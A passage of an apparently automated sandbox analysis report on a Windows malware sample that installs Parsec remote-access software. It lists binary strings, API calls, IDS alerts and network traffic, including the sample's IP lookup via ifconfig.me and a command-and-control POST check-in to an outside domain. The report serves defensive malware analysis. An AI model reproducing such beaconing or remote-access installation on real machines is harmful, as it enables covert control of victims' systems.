Source: Binary string: SystemEventsBrokerClient.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: RdpSaUacHelper.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-H8DB6.tmp.1.dr
Source: Binary string: SocialApis.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: SyncInfrastructurePS.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: NetworkHelper.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-4HGOQ.tmp.1.dr
Source: Binary string: D:\gitsrc\parsec-cloud\magic-mirror\driver\x64\Release\mm.pdb source: nefconw.exe, 0000004A.00000003.2108779412.0000026240A6A000.00000004.00000020.00020000.00000000.sdmp, SETFD68.tmp.74.dr
Source: Binary string: verifier.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: MFWMAAEC.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c\parsec-cloud\usb-ip\parsecvirtualds\src\x64\Release\parsecvirtualds.pdb source: nefconw.exe, 00000039.00000002.2090721984.000001F9FBA9F000.00000004.00000020.00020000.00000000.sdmp, nefconw.exe, 00000039.00000003.2066450318.000001F9FBAAE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dskquoui.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: sscore.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: netlogon.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: SocialApis.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: NetworkHelper.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-4HGOQ.tmp.1.dr
Source: Binary string: icuin.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-BUN5H.tmp.1.dr
Source: Binary string: MCRecvSrc.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-HA8AR.tmp.1.dr
Source: Binary string: SyncInfrastructurePS.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: MCRecvSrc.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-HA8AR.tmp.1.dr
Source: Binary string: WSClient.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-CEDA5.tmp.1.dr
Source: Binary string: wiashext.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: lockappbroker.pdbUGP source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wkbda3.pdb source: uu8v4UUzTU.tmp, 00000001.00000002.2152942703.000000000018D000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: MFWMAAEC.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Windows.ApplicationModel.ConversationalAgent.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: TrustedSignalCredProv.pdbGCTL source: is-NRIH7.tmp.1.dr
Source: Binary string: wkbdibm02.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wkbdarmty.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dskquoui.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wups.pdbUGP source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\gitsrc\parsec-cloud\usb-ip\pcvudhc\x64\Release\parsecvusba.pdb source: drvinst.exe, 00000037.00000003.2032436401.000002B48D5F1000.00000004.00000020.00020000.00000000.sdmp, SETDCF0.tmp.53.dr, parsecvusba.sys.46.dr
Source: Binary string: SystemEventsBrokerClient.pdbUGP source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dmcfgutils.pdbUGP source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: lockappbroker.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Windows.UI.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dmcfgutils.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: verifier.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: netlogon.pdbUGP source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wiashext.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: TpmTool.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: sscore.pdbUGP source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: xpsservices.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: TrustedSignalCredProv.pdb source: is-NRIH7.tmp.1.dr
Source: Binary string: Windows.UI.pdbUGP source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cryptdlg.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wlanext.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_00418318 FindFirstFileW,FindFirstFileW,free,5_2_00418318
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeCode function: 12_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,12_2_00405C49
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeCode function: 12_2_00406873 FindFirstFileW,FindClose,12_2_00406873
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeCode function: 12_2_0040290B FindFirstFileW,12_2_0040290B
Source: C:\Program Files\Parsec\pservice.exeCode function: 40_2_00007FF7EC03A89C FindFirstFileExW,40_2_00007FF7EC03A89C
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeCode function: 46_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,46_2_00405C49
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeCode function: 46_2_00406873 FindFirstFileW,FindClose,46_2_00406873
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeCode function: 46_2_0040290B FindFirstFileW,46_2_0040290B
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C58EE4 FindFirstFileExW,49_2_00007FF763C58EE4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694BC85E4 FindFirstFileExW,52_2_00007FF694BC85E4
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeCode function: 66_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,66_2_00405C49
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeCode function: 66_2_00406873 FindFirstFileW,FindClose,66_2_00406873
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeCode function: 66_2_0040290B FindFirstFileW,66_2_0040290B
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750F85E4 FindFirstFileExW,72_2_00007FF6750F85E4
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_00419414 free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free,5_2_00419414

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2051091 - Severity 1 - ET MALWARE Unknown Malvertising Payload CnC Checkin (PSecWin) : 192.168.2.4:49734 -> 188.114.97.3:443
Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox ViewIP Address: 34.160.111.145 34.160.111.145
Source: Joe Sandbox ViewIP Address: 34.160.111.145 34.160.111.145
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: unknownDNS query: name: ifconfig.me
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 188.114.97.3:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 34.160.111.145:443
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49735
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49751
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ifconfig.me
Source: global trafficHTTP traffic detected: POST /?CheckApp HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencoded; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 156Host: beautifullyuncluttered.com
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ifconfig.me
Source: global trafficDNS traffic detected: DNS query: ifconfig.me
Source: global trafficDNS traffic detected: DNS query: beautifullyuncluttered.com
Source: global trafficDNS traffic detected: DNS query: builds.parsec.app
Source: unknownHTTP traffic detected: POST /?CheckApp HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencoded; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 156Host: beautifullyuncluttered.com
Source: parsec-windows.exe, 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000028.00000003.2742558824.000001988FFEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3575054832.000001988FF65000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309422964.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2743387928.000001989087F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2743298668.0000019890869000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2228501112.00000198908B3000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.3337367644.000001989086D000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742435199.0000019890869000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309499408.0000019890894000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309199634.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2126735399.000001989002F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3576139520.000001989086E000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742828975.000001988FFEB000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.3337299753.000001989087F000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002E.00000002.2092202681.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000042.00000002.2124004520.000000000040A000.00000004.00000001.01000000.00000018.sdmp, parsec-windows.exe.5.dr, parsec-vud.exe.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: parsec-windows.exe, 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000028.00000003.2742558824.000001988FFEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309422964.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2228501112.00000198908B3000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742558824.0000019890081000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309199634.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2126735399.000001989002F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3575628914.000001988FFED000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2743225180.0000019890085000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742804940.0000019890084000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742828975.000001988FFEB000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002E.00000002.2092202681.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000042.00000002.2124004520.000000000040A000.00000004.00000001.01000000.00000018.sdmp, parsec-windows.exe.5.dr, parsec-vud.exe.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: parsec-windows.exe, 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000028.00000003.2742558824.000001988FFEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3575054832.000001988FF65000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309422964.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2743387928.000001989087F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2228501112.00000198908B3000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309199634.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2126735399.000001989002F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3575628914.000001988FFED000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742828975.000001988FFEB000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.3337299753.000001989087F000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002E.00000002.2092202681.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000042.00000002.2124004520.000000000040A000.00000004.00000001.01000000.00000018.sdmp, parsec-windows.exe.5.dr, parsec-vud.exe.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: parsec-windows.exe, 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000028.00000003.2743298668.0000019890878000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742558824.000001988FFEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3575054832.000001988FF65000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309422964.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2743387928.000001989087F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3576173174.0000019890878000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742435199.0000019890878000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2228501112.00000198908B3000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309199634.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2126735399.000001989002F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742828975.000001988FFEB000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.3337299753.000001989087F000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002E.00000002.2092202681.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000042.00000002.2124004520.000000000040A000.00000004.00000001.01000000.00000018.sdmp, parsec-windows.exe.5.dr, parsec-vud.exe.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: drvinst.exe, 00000037.00000003.2039083129.000002B48D596000.00000004.00000020.00020000.00000000.sdmp, drvinst.exe, 00000037.00000003.2038432096.000002B48D588000.00000004.00000020.00020000.00000000.sdmp, drvinst.exe, 00000037.00000003.2036630983.000002B48D59B000.00000004.00000020.00020000.00000000.sdmp, drvinst.exe, 00000037.00000002.2039476468.000002B48D598000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
Source: parsec-windows.exe, 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000028.00000003.2742558824.000001988FFEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3575054832.000001988FF65000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309422964.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2743387928.000001989087F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2743298668.0000019890869000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2228501112.00000198908B3000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.3337367644.000001989086D000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742435199.0000019890869000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309499408.0000019890894000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309199634.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2126735399.000001989002F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3576139520.000001989086E000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742828975.000001988FFEB000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.3337299753.000001989087F000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002E.00000002.2092202681.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000042.00000002.2124004520.000000000040A000.00000004.00000001.01000000.00000018.sdmp, parsec-windows.exe.5.dr, parsec-vud.exe.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: pservice.exe, 00000028.00000003.2742558824.000001988FFEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309422964.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2228501112.00000198908B3000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742558824.0000019890081000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309199634.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2126735399.000001989002F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3575628914.000001988FFED000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2743225180.0000019890085000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742804940.0000019890084000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742828975.000001988FFEB000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002E.00000002.2092202681.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000042.00000002.2124004520.000000000040A000.00000004.00000001.01000000.00000018.sdmp, parsec-windows.exe.5.dr, parsec-vud.exe.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: parsec-windows.exe, 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000028.00000003.2742558824.000001988FFEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3575054832.000001988FF65000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309422964.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2743387928.000001989087F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2228501112.00000198908B3000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309199634.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2126735399.000001989002F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3575628914.000001988FFED000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742828975.000001988FFEB000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.3337299753.000001989087F000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002E.00000002.2092202681.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000042.00000002.2124004520.000000000040A000.00000004.00000001.01000000.00000018.sdmp, parsec-windows.exe.5.dr, parsec-vud.exe.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: parsec-vud.exe.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: parsec-windows.exe, 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000028.00000003.2742558824.000001988FFEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309422964.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2228501112.00000198908B3000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742558824.0000019890081000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309199634.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2126735399.000001989002F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3575628914.000001988FFED000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2743225180.0000019890085000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742804940.0000019890084000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742828975.000001988FFEB000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002E.00000002.2092202681.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000042.00000002.2124004520.000000000040A000.00000004.00000001.01000000.00000018.sdmp, parsec-windows.exe.5.dr, parsec-vud.exe.12.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: parsec-windows.exe, 0000000C.00000000.1878859711.000000000040A000.00000008.00000001.01000000.0000000A.sdmp, parsec-windows.exe, 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, parsec-vud.exe, 0000002E.00000002.2092202681.000000000040A000.00000004.00000001.01000000.00000011.sdmp, parsec-vud.exe, 0000002E.00000000.2008553821.000000000040A000.00000008.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000042.00000002.2124004520.000000000040A000.00000004.00000001.01000000.00000018.sdmp, parsec-vdd.exe, 00000042.00000000.2095284861.000000000040A000.00000008.00000001.01000000.00000018.sdmp, parsec-windows.exe.5.dr, parsec-vud.exe.12.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: pservice.exe, 00000028.00000003.3336997303.0000019890056000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742828975.0000019890056000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3575835781.0000019890056000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3576074424.0000019890860000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSRXerF0eFeSWRripTgTkcJWMm7iQQUaDfg67Y7%2BF8Rh
Source: pservice.exe, 00000028.00000002.3576040619.0000019890087000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742558824.0000019890081000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2743225180.0000019890085000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742804940.0000019890084000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3575175842.000001988FFDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxL
Source: parsec-windows.exe, 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000028.00000003.2742558824.000001988FFEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309422964.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2228501112.00000198908B3000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742558824.0000019890081000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309199634.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2126735399.000001989002F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3575628914.000001988FFED000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2743225180.0000019890085000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742804940.0000019890084000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742828975.000001988FFEB000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002E.00000002.2092202681.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000042.00000002.2124004520.000000000040A000.00000004.00000001.01000000.00000018.sdmp, parsec-windows.exe.5.dr, parsec-vud.exe.12.drString found in binary or memory: http://ocsp.digicert.com0
